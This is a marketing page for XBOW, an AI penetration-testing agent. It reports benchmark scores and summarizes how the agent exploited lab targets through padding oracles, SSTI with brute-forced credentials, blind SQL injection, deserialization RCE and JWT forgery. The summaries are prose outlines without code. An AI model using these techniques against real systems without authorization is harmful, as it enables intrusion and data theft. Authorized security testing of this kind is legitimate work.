Movatterモバイル変換


[0]ホーム

URL:


XBOW uncovers a critical CVE in an open-source Q&A platformRead more
XBOW Logo

Boosting offensive security with AI

XBOW autonomously finds and exploits vulnerabilities in 75% of web benchmarks

195 / 261

PortSwigger Labs

solved
204 / 282

PentesterLab Exercises

solved
88 / 104

Novel Benchmarks

solved

See XBOW at work

XBOW pursues high-level goals by executing commands and reviewing their output, without any human intervention.

These are real examples of XBOW solving benchmarks. The only guidance provided to XBOW, aside from general instructions that are identical for every task, is the benchmark description. If you'd like to see all the data,click here.

Breaking a Cryptographic CAPTCHA with a CBC Padding Oracle

Don't roll your own crypto—or XBOW might break it. This trace shows XBOW pulling off a classicPadding Oracle attack on an AES-CBC implementation in the novel XBOW benchmark "Bad Captcha". By manipulating the authentication cookie used by the app, XBOW is able todecrypt the secret one byte at a time and use it to register a new user.

  1. XBOW begins by verifying the presence of the CAPTCHA cookie and understanding its structure, guessing from the size (256-bit) that it may use AES

  2. XBOW begins its attempt to implement an attack to decrypt the cookie, refining its code anddebugging issues it encounters

  3. One of its attempts reveals that the server responds withInvalid padding rather thanInvalid CAPTCHA in some cases—a crucial feature of a padding oracle vulnerability

  4. After noticing that some cookie values trigger a500 Internal Server Error, XBOW explores possible non-cryptographic attacks like SSTI

  5. XBOW decides to execute a full CBC padding attack, and successfullydecrypts the CAPTCHA cookie, but is unable to modify it to bypass authentication

  6. It realizes that the attack needs to target the CAPTCHA input (rather than modifying the cookie), and uses the decrypted cookie to create a new user andobtain the flag

Copied to clipboard!

Exploiting Insecure Direct Object Reference (IDOR) in a GraphQL API

Even when weentirely removed the benchmark description provided by its author, XBOW still solved this novel benchmark. From nothing but a login page, it guesses a valid username and password, analyzes the code of the prescription management app, and uses GraphQL introspection queries to view the prescriptions of all users on the site—finding one that holds the flag.

Copied to clipboard!

Debugging, Testing, and Refining a Jenkins Remote Code Execution Exploit

After a benchmark bug made this"Medium" difficulty PentesterLab exercise much more difficult than intended, XBOW beats the odds by debugging not only its own code but thecompromised server as well. Its final solution—a Python program that exploits XML deserialization to deploy an embeddedbash script, stealing secrets from running processes' command lines—is a thing of beauty.

  1. XBOW checks for public exploits usingsearchsploit, but ultimately opts to write its own code to exploit the issue

  2. When its initial attempts don't succeed, XBOW shows heroic perseverance in the face of very long Java stack traces, using the server's error messages to identify and fix issues

  3. After extensive debugging, XBOW determines the correct format expected by the server, andsuccessfully submits a malicious job that will run/usr/local/bin/exfiltrate on the server to exfiltrate the flag–but does not receive the flag due to a missing environment variable in the benchmark setup

  4. Undeterred, XBOW uses its newfound ability to remotely execute code todebug the server environment itself

  5. By launching the exfiltration binary in the background and monitoring activity on the server, itspots the flag in the output ofps, allowing it to solve the benchmark

Copied to clipboard!

Researching and Implementing an Exploit for a node-jose Vulnerability

Faced with the task of exploiting CVE-2018-0114 innode-jose, XBOW combs through reams of GitHub issues and then uses what it learns tocraft a custom proof-of-concept exploit to solve anexercise from PentesterLab rated "Hard".

  1. At first, XBOW tries to figure out how to exploit the vulnerability on its own

  2. It eventually concludes it's not making good progress, and embarks on a new goal: researching and crafting a precise exploit for CVE-2018-0114 innode-jose

  3. XBOW doesresearch online by first checking NVD (unsuccessfully) and then using the GitHub API to search for repos related to CVE-2018-0114; this search is successful, but downloading the PoC fails

  4. It then decides to dump all GitHub issues mentioningnode-jose jwt vulnerability–around22,000 words, or 350KB of text–and reads them to understand the flaw

  5. XBOW synthesizes what it read and uses what its new understanding to craft a Python script to exploit the vulnerability

  6. After one more round of tinkering, XBOWsuccessfully exploits the issue, forging an admin JWT token using its own RSA keypair, and uses it to get the flag

Copied to clipboard!

Leveraging Weak Credentials to Exploit SSTI Vulnerabilities

After brute-forcing its way through the login system, XBOW explores the web app's internals and uncovers aServer-Side Template Injection (SSTI) vulnerability that allows executing arbitrary code remotely. As it proceeds, its payloads grow fearsomely complex, but its final solution to this novel XBOW benchmark is simple and elegant.

  1. After surveying the login page, XBOW employs brute-force guessing with common usernames and passwords, identifyingweak credentials

  2. XBOW uses these weak credentials (user:user) to achieve authenticated access to the application and explore further

  3. After spotting a potential vulnerability in the/remind endpoint via itsdate parameter, it investigates whether it is susceptible toserver-side vulnerabilities

  4. After some analysis, XBOW decides to investigateSSTI attacks in depth, progressively refining an attack script that tests common payloads

  5. Once the presence of an SSTI vulnerability is confirmed, XBOW attempts toread sensitive files or potentially write aweb shell for more persistent access

  6. With remote code execution capability confirmed, XBOW produces a complete exploit that retrieves the content of theflag.txt file and solves the benchmark

Copied to clipboard!

Exploiting Blind SQL Injection from Scratch

XBOW can use existing tools, but it alsounderstands the fundamentals. In this trace, it solves a"Practitioner"-level PortSwigger Blind SQL Injection lab without usingsqlmap. Instead, it identifies a difference in how the server responds to different malformed SQL queries, and then exploits that difference to leak out the admin password one character at a time.

  1. XBOW starts by confirming the existence of aBlind SQL Injection vulnerability by looking for payloads that cause the application's behavior to change in response to the injected SQL

  2. After several unsuccessful initial tries, it steps back, considers its work so far, and proposes new approaches that could allow it to leak the database content

  3. XBOW confirms the vulnerability, andmanually crafts initial commands to probe the length of theadministrator password, making one guess at a time

  4. XBOW automates the process of determining the password length by writing a custom Python script that reveals the length

  5. Once it determines that the password is 20 characters, XBOW updates the script to toguess each character of the password one by one, using the same Blind SQL Injection oracle

  6. The script successfully extracts the full administrator password, and XBOW uses it to log in and retrieve the flag

Copied to clipboard!

Subverting Java Deserialization with Apache Commons

Despite facing a litany of technical challenges brought on by Java version incompatibilities, XBOW solves a"Practitioner"-level PortSwigger lab by subverting Java's mechanism for reconstructing an object from a sequence of bytes toexecute arbitrary code when the unsuspecting application deserializes untrusted data.

Copied to clipboard!

Bypassing Filters and Exploiting Complex Cross-Site Scripting (XSS)

In this novel XBOW benchmark, XBOW detects one of theOWASP Top 10 most common vulnerabilities: Cross-Site Scripting (XSS). By hacking its way through a thicket of security filters, XBOW is able to find a bypass and exploit the XSS by usingHTML entities encoding.

Copied to clipboard!

Writing a Customized SHA-256 Implementation for a Hash Length Extension Attack

To solve thisPentesterLab "Hard" exercise (completed by only 649 human users on the site), XBOWwrites its own implementation of SHA-256 from scratch and uses it to build a directory traversal payload with a forged signature using a hash extension attack—allwithout access to the tutorial given to human solvers.

  1. XBOW first fetches the provided Ruby source code for the app, and learns from reading it that the app's/getfile endpoint can be used toread arbitrary files—but only if accompanied by a valid SHA-256 signature

  2. Recognizing that it needs to execute a hash extension attack, XBOW attempts to installhash_extender, but finds that it is not available throughapt

  3. It also tries to implement the attack using Python's standardhashlib library, but finds that its API does not offer sufficient control over the internal SHA-256 state variable it needs to manipulate

  4. After another unsuccessful attempt to obtain and use a third-party tool, XBOW decides towrite its own SHA-256 implementation from scratch

  5. Its implementation of SHA-256 is correct, but its initial attempts to forge a signature and sign a payload that obtains the flag using directory traversal do not work

  6. After debugging the issue and hypothesizing that its earlier mistake was due to missing URL encoding, XBOW writes a Python script to retry the attack with a variety of key lengths—andsucceeds on its next try

Copied to clipboard!

Team

Security, AI, and Engineering

Oege de Moor

Oege de Moor

Founder and CEO

LinkedinGitHubX
Nico Waisman

Nico Waisman

Head of Security

LinkedinGitHubX
Albert Ziegler

Albert Ziegler

Head of AI

LinkedinGitHub
Andrew Rice

Andrew Rice

Head of Engineering

LinkedinGitHub
Aqeel Siddiqui

Aqeel Siddiqui

Head of Operations

LinkedinGitHub
Alex Gatzlaff

Alex Gatzlaff

Account Executive

Linkedin
Alvaro Muñoz

Alvaro Muñoz

Security Researcher

LinkedinGitHubBlueskyX
Brendan Coll

Brendan Coll

Research Engineer

LinkedinGitHubBluesky
Brendan Dolan-Gavitt

Brendan Dolan-Gavitt

AI Researcher

LinkedinGitHubBlueskyX
Daniel Wagner

Daniel Wagner

Research Engineer

LinkedinGitHub
Diego Jurado

Diego Jurado

Security Researcher

LinkedinGitHubX
Ewan Mellor

Ewan Mellor

Research Engineer

LinkedinGitHubBluesky
Fernando Russ

Fernando Russ

Research Engineer

LinkedinGitHubX
Ian Campbell

Ian Campbell

Research Engineer

GitHub
Javier Gil

Javier Gil

Security Researcher

LinkedinGitHubBlueskyX
Joanna Clifton

Joanna Clifton

Operations

Linkedin
Joel Noguera

Joel Noguera

Security Researcher

LinkedinGitHubX
Johan Rosenkilde

Johan Rosenkilde

AI Researcher

LinkedinGitHub
Jordan McTaggart

Jordan McTaggart

Finance and Operations

LinkedinX
Max Schaefer

Max Schaefer

AI Researcher

LinkedinGitHub
Meurig Thomas

Meurig Thomas

Research Engineer

LinkedinGitHub
Nicolas Trippar

Nicolas Trippar

Security Researcher

GitHubX
Thomas Bolton

Thomas Bolton

AI Researcher

LinkedinGitHub
You?

We are recruiting.

See open positionsEmail us

Blog

Updates and opinions from the team

December 20, 2024  -  By Nico Waisman

The Nightmare Before Christmas: An arbitrary file download on Zoo-Project

XBOW discovered an arbitrary file download vulnerability on the WPS open source app Zoo-Project.

Read post

December 13, 2024  -  By Diego Jurado

Stored Cross-Site Scripting (XSS) in 2FAuth

XBOW discovered a Cross-Site Scripting (XSS) vulnerability in the open-source project, 2FAuth.

Read post

December 2, 2024  -  By Diego Jurado

LabsAI’s EDDI project path traversal

XBOW discovered a Path Traversal vulnerability in the open-source project, LabsAI’s EDDI.

Read post
Show more

Frequently asked questions

Benchmarks

What do you consider a “benchmark”?

A benchmark is a realistic exercise in web security, with a crisp success criterion like capturing a flag. Manychallenges in CTF contests do not qualify because they are brainteasers rather than reflecting a realistic web securityscenario.

Where did XBOW get its collection of benchmarks?

XBOW’s benchmarks have been carefully selected for relevance and breadth by its security experts. Sources includeleading vendors of training materials, such as PortSwigger and PentesterLab, and public CTF competitions. Somebenchmarks have been authored specifically for XBOW, so we can be sure they do not occur in any training sets.

The original PortSwigger labs do not have flags — why do the traces shown for these benchmarks include a flag?

The PortSwigger labs detect automatically whether you have solved the lab or not. However, we wanted all benchmarks tohave the same crisp success criterion which can be checked by our infrastructure. So we introduced a flag and amechanism for returning it.

Could you provide more information about the novel XBOW benchmarks?

XBOW’s security experts designed a set of unique web benchmarks to ensure that solutions were never included in anytraining data. The benchmarks are representative of many vulnerability classes, and varying degrees of difficulty.

Will the novel XBOW benchmarks be released?

Yes. The novel XBOW benchmarks will be open-sourced soon. We hope others will join us in using these benchmarksto set a new standard for the evaluation of security tools.

How many benchmarks does XBOW have?

XBOW has collected a corpus of thousands of benchmarks, both for the purpose of evaluating performance, and forimproving performance.

Where can I find more details about the benchmarks that XBOW solved?

We provide more details to back up the results reported on this website. Seeherefor the benchmarks that were attempted, and which were solved.

Technology

How does the AI inside XBOW work?

It is an example of ‘agentic AI’. We use many standard techniques, but also plenty of proprietary innovations. Asidefrom general guidance that is identical for every task, the only directions given to XBOW are the basic benchmarkdescription.

As a growing startup, this intellectual property is our main asset, so we cannot share the details.

Are the example traces shown edited?

The AI reasoning and command outputs shown in our example traces have not been edited in any way (e.g., wrapped lines are still present). We have withheld the general guidance (“prompts”) to protect XBOW’s proprietary technology.

Can XBOW find and exploit vulnerabilities without providing descriptions or without having “flags” as a goal?

Yes, we have run experiments byblanking out the descriptions and that works fine. Without flags as a goal, XBOW decideson its own when it has finished. You can prompt it to be more or less aggressive - for example, when it discovers a SQLinjection, it can (after approval from a human operator) continue to exfiltrate valuable data from the database, or juststop and report the core problem.

Is XBOW useful for everyone or does it require any sort of specific knowledge?

XBOW is useful for anyone looking to improve the security of their web applications. You don’t need to be a security orAI expert to use it—a lot of deep security knowledge is baked into the XBOW product. This is the magic of our team,combining such security expertise with AI and engineering skills.

Responsible AI

How will you ensure your technology won't be misused?

We will only make our technology available to trusted customers in the cloud. It is not possible to run XBOW as a standalone applicationoutside our control.


Join the waitlist

Sign up

XBOW

Join the waitlist

Be the first to know when we launch

By signing up to the waitlist, you agree to let us contact you with announcements about our technology, and you certify that you are over the age of 16.


[8]ページ先頭

©2009-2025 Movatter.jp